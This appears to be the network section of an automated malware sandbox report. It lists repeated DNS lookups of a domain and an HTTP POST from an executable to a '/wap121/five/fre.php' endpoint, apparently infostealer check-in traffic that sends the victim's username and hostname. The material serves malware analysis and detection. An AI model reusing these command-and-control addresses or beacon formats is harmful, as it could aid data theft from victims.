Feb 22, 2021 19:13:35.697698116 CET | 192.168.2.4 | 8.8.8.8 | 0x43e1 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:36.975975990 CET | 192.168.2.4 | 8.8.8.8 | 0x5256 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:38.294977903 CET | 192.168.2.4 | 8.8.8.8 | 0xba7c | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:39.589708090 CET | 192.168.2.4 | 8.8.8.8 | 0x6371 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:40.908086061 CET | 192.168.2.4 | 8.8.8.8 | 0x8eb6 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:42.180453062 CET | 192.168.2.4 | 8.8.8.8 | 0x3351 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:43.470884085 CET | 192.168.2.4 | 8.8.8.8 | 0x40f2 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:44.744219065 CET | 192.168.2.4 | 8.8.8.8 | 0xb103 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:46.029913902 CET | 192.168.2.4 | 8.8.8.8 | 0x15f5 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:47.358259916 CET | 192.168.2.4 | 8.8.8.8 | 0xe9f4 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:48.636250973 CET | 192.168.2.4 | 8.8.8.8 | 0x8755 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:49.926906109 CET | 192.168.2.4 | 8.8.8.8 | 0xa2e | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:51.217977047 CET | 192.168.2.4 | 8.8.8.8 | 0xb66a | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:52.534214973 CET | 192.168.2.4 | 8.8.8.8 | 0xaab4 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:53.826677084 CET | 192.168.2.4 | 8.8.8.8 | 0x94a5 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:55.097614050 CET | 192.168.2.4 | 8.8.8.8 | 0xfe8e | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:56.374689102 CET | 192.168.2.4 | 8.8.8.8 | 0xf40b | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:57.636794090 CET | 192.168.2.4 | 8.8.8.8 | 0xb50b | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:58.918042898 CET | 192.168.2.4 | 8.8.8.8 | 0x189e | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:00.227699995 CET | 192.168.2.4 | 8.8.8.8 | 0xd116 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:01.510381937 CET | 192.168.2.4 | 8.8.8.8 | 0x15cc | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:02.839185953 CET | 192.168.2.4 | 8.8.8.8 | 0xa955 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:04.114171028 CET | 192.168.2.4 | 8.8.8.8 | 0xaded | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:05.420623064 CET | 192.168.2.4 | 8.8.8.8 | 0x92db | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:06.720895052 CET | 192.168.2.4 | 8.8.8.8 | 0xa19a | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:08.022066116 CET | 192.168.2.4 | 8.8.8.8 | 0x9f0d | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:09.293391943 CET | 192.168.2.4 | 8.8.8.8 | 0xeef4 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:10.585911036 CET | 192.168.2.4 | 8.8.8.8 | 0xc87f | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:11.897115946 CET | 192.168.2.4 | 8.8.8.8 | 0xa87e | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:13.196566105 CET | 192.168.2.4 | 8.8.8.8 | 0x7172 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:15.029618979 CET | 192.168.2.4 | 8.8.8.8 | 0xd6e2 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:16.292236090 CET | 192.168.2.4 | 8.8.8.8 | 0x709a | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:17.598541975 CET | 192.168.2.4 | 8.8.8.8 | 0x8a0 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:18.904568911 CET | 192.168.2.4 | 8.8.8.8 | 0x7e31 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:20.202388048 CET | 192.168.2.4 | 8.8.8.8 | 0x9814 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:21.463465929 CET | 192.168.2.4 | 8.8.8.8 | 0x9e5b | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:22.777031898 CET | 192.168.2.4 | 8.8.8.8 | 0xc629 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:24.085288048 CET | 192.168.2.4 | 8.8.8.8 | 0x18ab | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:25.337888002 CET | 192.168.2.4 | 8.8.8.8 | 0x973d | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:26.620599985 CET | 192.168.2.4 | 8.8.8.8 | 0xe366 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:27.894123077 CET | 192.168.2.4 | 8.8.8.8 | 0xdaf0 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:29.153413057 CET | 192.168.2.4 | 8.8.8.8 | 0x969f | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:30.406487942 CET | 192.168.2.4 | 8.8.8.8 | 0x78c7 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:31.727921963 CET | 192.168.2.4 | 8.8.8.8 | 0xea94 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:33.020991087 CET | 192.168.2.4 | 8.8.8.8 | 0xe4e5 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:34.320353031 CET | 192.168.2.4 | 8.8.8.8 | 0xe926 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:35.638341904 CET | 192.168.2.4 | 8.8.8.8 | 0x677a | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:36.937913895 CET | 192.168.2.4 | 8.8.8.8 | 0xd1e2 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:38.226160049 CET | 192.168.2.4 | 8.8.8.8 | 0x266a | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:39.548564911 CET | 192.168.2.4 | 8.8.8.8 | 0x4299 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:40.861488104 CET | 192.168.2.4 | 8.8.8.8 | 0x8033 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:42.153589010 CET | 192.168.2.4 | 8.8.8.8 | 0xa184 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:43.443846941 CET | 192.168.2.4 | 8.8.8.8 | 0xa0af | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:44.731411934 CET | 192.168.2.4 | 8.8.8.8 | 0x532b | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:46.037934065 CET | 192.168.2.4 | 8.8.8.8 | 0x6761 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:47.326683998 CET | 192.168.2.4 | 8.8.8.8 | 0xea29 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:48.652367115 CET | 192.168.2.4 | 8.8.8.8 | 0x6a3a | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:49.946625948 CET | 192.168.2.4 | 8.8.8.8 | 0x3ab8 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:51.218924046 CET | 192.168.2.4 | 8.8.8.8 | 0x65f4 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:52.516993046 CET | 192.168.2.4 | 8.8.8.8 | 0xb1f8 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:53.796204090 CET | 192.168.2.4 | 8.8.8.8 | 0xcbd8 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:55.085910082 CET | 192.168.2.4 | 8.8.8.8 | 0x1512 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:56.344922066 CET | 192.168.2.4 | 8.8.8.8 | 0xf929 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)

                                          DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 22, 2021 19:13:01.708600998 CET | 8.8.8.8 | 192.168.2.4 | 0xf2b4 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:03.113802910 CET | 8.8.8.8 | 192.168.2.4 | 0xc3d2 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:04.329303026 CET | 8.8.8.8 | 192.168.2.4 | 0xf658 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:05.698806047 CET | 8.8.8.8 | 192.168.2.4 | 0xf93e | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:07.065711021 CET | 8.8.8.8 | 192.168.2.4 | 0xa7f6 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:09.033745050 CET | 8.8.8.8 | 192.168.2.4 | 0x3a63 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:10.409897089 CET | 8.8.8.8 | 192.168.2.4 | 0xddf9 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:11.784482002 CET | 8.8.8.8 | 192.168.2.4 | 0x96c5 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:13.098505974 CET | 8.8.8.8 | 192.168.2.4 | 0x7723 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:14.410690069 CET | 8.8.8.8 | 192.168.2.4 | 0xfb83 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:15.753534079 CET | 8.8.8.8 | 192.168.2.4 | 0x4299 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:17.062061071 CET | 8.8.8.8 | 192.168.2.4 | 0xdb49 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:18.400012016 CET | 8.8.8.8 | 192.168.2.4 | 0x177c | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:19.701555014 CET | 8.8.8.8 | 192.168.2.4 | 0xbe65 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:20.985097885 CET | 8.8.8.8 | 192.168.2.4 | 0x7c9d | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:22.325532913 CET | 8.8.8.8 | 192.168.2.4 | 0x8e2a | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:23.659809113 CET | 8.8.8.8 | 192.168.2.4 | 0x4b1c | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:25.014542103 CET | 8.8.8.8 | 192.168.2.4 | 0x9f7 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:26.614264011 CET | 8.8.8.8 | 192.168.2.4 | 0x8dca | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:27.933027983 CET | 8.8.8.8 | 192.168.2.4 | 0xe56c | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:29.239970922 CET | 8.8.8.8 | 192.168.2.4 | 0xd2ae | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:30.543951035 CET | 8.8.8.8 | 192.168.2.4 | 0x5c1d | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:31.841751099 CET | 8.8.8.8 | 192.168.2.4 | 0x73e3 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:33.143090010 CET | 8.8.8.8 | 192.168.2.4 | 0xa1ca | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:34.473993063 CET | 8.8.8.8 | 192.168.2.4 | 0xc977 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:35.749298096 CET | 8.8.8.8 | 192.168.2.4 | 0x43e1 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:37.036025047 CET | 8.8.8.8 | 192.168.2.4 | 0x5256 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:38.343662024 CET | 8.8.8.8 | 192.168.2.4 | 0xba7c | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:39.638431072 CET | 8.8.8.8 | 192.168.2.4 | 0x6371 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:40.957115889 CET | 8.8.8.8 | 192.168.2.4 | 0x8eb6 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:42.242538929 CET | 8.8.8.8 | 192.168.2.4 | 0x3351 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:43.532692909 CET | 8.8.8.8 | 192.168.2.4 | 0x40f2 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:44.793344975 CET | 8.8.8.8 | 192.168.2.4 | 0xb103 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:46.095216990 CET | 8.8.8.8 | 192.168.2.4 | 0x15f5 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:47.418471098 CET | 8.8.8.8 | 192.168.2.4 | 0xe9f4 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:48.698528051 CET | 8.8.8.8 | 192.168.2.4 | 0x8755 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:49.976164103 CET | 8.8.8.8 | 192.168.2.4 | 0xa2e | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:51.275183916 CET | 8.8.8.8 | 192.168.2.4 | 0xb66a | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:52.587490082 CET | 8.8.8.8 | 192.168.2.4 | 0xaab4 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:53.875464916 CET | 8.8.8.8 | 192.168.2.4 | 0x94a5 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:55.155000925 CET | 8.8.8.8 | 192.168.2.4 | 0xfe8e | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:56.423229933 CET | 8.8.8.8 | 192.168.2.4 | 0xf40b | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:57.693878889 CET | 8.8.8.8 | 192.168.2.4 | 0xb50b | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:58.975639105 CET | 8.8.8.8 | 192.168.2.4 | 0x189e | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:00.289978027 CET | 8.8.8.8 | 192.168.2.4 | 0xd116 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:01.575758934 CET | 8.8.8.8 | 192.168.2.4 | 0x15cc | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:02.888058901 CET | 8.8.8.8 | 192.168.2.4 | 0xa955 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:04.163002968 CET | 8.8.8.8 | 192.168.2.4 | 0xaded | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:05.469511986 CET | 8.8.8.8 | 192.168.2.4 | 0x92db | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:06.769843102 CET | 8.8.8.8 | 192.168.2.4 | 0xa19a | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:08.070943117 CET | 8.8.8.8 | 192.168.2.4 | 0x9f0d | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:09.352627993 CET | 8.8.8.8 | 192.168.2.4 | 0xeef4 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:10.638309002 CET | 8.8.8.8 | 192.168.2.4 | 0xc87f | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:11.957366943 CET | 8.8.8.8 | 192.168.2.4 | 0xa87e | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:13.248152971 CET | 8.8.8.8 | 192.168.2.4 | 0x7172 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:15.078545094 CET | 8.8.8.8 | 192.168.2.4 | 0xd6e2 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:16.344048023 CET | 8.8.8.8 | 192.168.2.4 | 0x709a | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:17.658497095 CET | 8.8.8.8 | 192.168.2.4 | 0x8a0 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:18.961647034 CET | 8.8.8.8 | 192.168.2.4 | 0x7e31 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:20.252974033 CET | 8.8.8.8 | 192.168.2.4 | 0x9814 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:21.528162003 CET | 8.8.8.8 | 192.168.2.4 | 0x9e5b | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:22.828773975 CET | 8.8.8.8 | 192.168.2.4 | 0xc629 | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
Feb 22, 2021 19:14:24.138386965 CET | 8.8.8.8 | 192.168.2.4 | 0x18ab | No error (0) | www.ritcophysiotherapy.com.au | | 203.170.84.89 | A (IP address) | IN (0x0001)
                                          Feb 22, 2021 19:14:25.386800051 CET8.8.8.8192.168.2.40x973dNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:26.670846939 CET8.8.8.8192.168.2.40xe366No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:27.951292992 CET8.8.8.8192.168.2.40xdaf0No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:29.203366041 CET8.8.8.8192.168.2.40x969fNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:30.455286026 CET8.8.8.8192.168.2.40x78c7No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:31.792812109 CET8.8.8.8192.168.2.40xea94No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:33.069703102 CET8.8.8.8192.168.2.40xe4e5No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:34.368915081 CET8.8.8.8192.168.2.40xe926No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:35.686975956 CET8.8.8.8192.168.2.40x677aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:36.989465952 CET8.8.8.8192.168.2.40xd1e2No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:38.275090933 CET8.8.8.8192.168.2.40x266aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:39.597359896 CET8.8.8.8192.168.2.40x4299No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:40.910367966 CET8.8.8.8192.168.2.40x8033No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:42.204519987 CET8.8.8.8192.168.2.40xa184No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:43.493170977 CET8.8.8.8192.168.2.40xa0afNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:44.783324003 CET8.8.8.8192.168.2.40x532bNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:46.086884975 CET8.8.8.8192.168.2.40x6761No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:47.375808954 CET8.8.8.8192.168.2.40xea29No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:48.703289032 CET8.8.8.8192.168.2.40x6a3aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:49.995392084 CET8.8.8.8192.168.2.40x3ab8No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:51.267704964 CET8.8.8.8192.168.2.40x65f4No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:52.566010952 CET8.8.8.8192.168.2.40xb1f8No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:53.844918966 CET8.8.8.8192.168.2.40xcbd8No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:55.140264988 CET8.8.8.8192.168.2.40x1512No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:56.395956993 CET8.8.8.8192.168.2.40xf929No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)

HTTP Request Dependency Graph

• www.ritcophysiotherapy.com.au

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49745 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:02.072160959 CET | 1419 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 190
Connection: close
Feb 22, 2021 19:13:02.422183037 CET | 1425 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: 'ckav.rujones910646DESKTOP-716T771k08F9C4E9C79A3B52B3F739430vCbcb
Feb 22, 2021 19:13:02.801673889 CET | 1431 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
